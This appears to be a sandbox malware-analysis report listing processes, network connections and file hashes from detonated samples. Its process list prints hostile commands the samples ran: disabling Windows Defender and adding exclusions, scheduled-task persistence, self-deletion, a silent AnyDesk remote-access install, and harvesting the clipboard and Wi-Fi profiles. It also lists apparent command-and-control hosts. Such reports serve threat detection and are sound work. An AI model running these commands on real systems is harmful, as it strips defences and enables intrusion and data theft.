C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 588 -p 5516 -ip 5516

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 588 -p 4016 -ip 4016

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4016 -s 668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2976 -ip 2976

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 1272

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6D572EB81CD218E5FBCEEECAD339B1B7

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"

C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe" --commit fullExeInstall

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe"

C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe

"C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6848 -ip 6848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 76

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5604 -ip 5604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1160

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F0.tmp\1F1.tmp\1F2.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3DF0.tmp\3DF1.tmp\3DF2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6004 -ip 6004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3352 -ip 3352

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 188

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

Network

Country Destination Domain Proto
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 172.67.139.78:443 drive-connect.cyou tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 78.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 186.58.21.104.in-addr.arpa udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:64295 tcp
N/A 127.0.0.1:64433 tcp
DE 185.220.101.195:443 tcp
US 8.8.8.8:53 195.101.220.185.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 62.210.131.119:9001 tcp
DE 51.89.106.29:8080 tcp
US 8.8.8.8:53 119.131.210.62.in-addr.arpa udp
US 8.8.8.8:53 29.106.89.51.in-addr.arpa udp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
FR 94.23.121.150:9001 tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 8.8.8.8:53 150.121.23.94.in-addr.arpa udp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 freegeoip.app udp
GB 20.26.156.215:80 github.com tcp
US 172.67.160.84:443 freegeoip.app tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 ipbase.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 172.67.209.71:443 ipbase.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 84.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 71.209.67.172.in-addr.arpa udp
US 154.216.17.90:80 tcp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 awake-weaves.cyou udp
US 8.8.8.8:53 ipwho.is udp
US 8.8.8.8:53 ip-api.com udp
US 172.67.143.116:443 awake-weaves.cyou tcp
DE 195.201.57.90:80 ipwho.is tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 jrqh-hk.com udp
CN 123.136.92.99:80 jrqh-hk.com tcp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.16.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 104.21.74.196:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 1.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 172.67.141.195:443 sordid-snaked.cyou tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 195.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.112:80 updates.signiant.com tcp
US 8.8.8.8:53 112.121.32.13.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 251.25.223.76.in-addr.arpa udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 webcdn.triongames.com udp
GB 2.19.117.97:80 webcdn.triongames.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 97.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 87.120.84.32:80 87.120.84.32 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 get.geojs.io udp
US 172.67.70.233:443 get.geojs.io tcp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 233.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
DE 94.156.177.133:7000 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 boot-01.net.anydesk.com udp
DE 195.181.174.173:443 boot-01.net.anydesk.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
GB 57.128.141.163:80 relay-ad195ac5.net.anydesk.com tcp
US 8.8.8.8:53 173.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 163.141.128.57.in-addr.arpa udp
US 8.8.8.8:53 api.playanext.com udp
DE 18.245.86.26:80 api.playanext.com tcp
US 8.8.8.8:53 26.86.245.18.in-addr.arpa udp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
DE 57.129.37.75:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-79bdf984.net.anydesk.com udp
GB 195.181.165.153:443 relay-79bdf984.net.anydesk.com tcp
US 8.8.8.8:53 75.37.129.57.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 153.165.181.195.in-addr.arpa udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
TH 165.154.184.75:80 165.154.184.75 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
HK 47.244.167.171:801 tcp
US 8.8.8.8:53 171.167.244.47.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
BG 195.230.23.72:80 tcp

Files


C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

MD5 4c64aec6c5d6a5c50d80decb119b3c78
SHA1 bc97a13e661537be68863667480829e12187a1d7
SHA256 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253
SHA512 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76

memory/5860-4248-0x00007FF755A30000-0x00007FF755EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\888.exe

MD5 b6e5859c20c608bf7e23a9b4f8b3b699
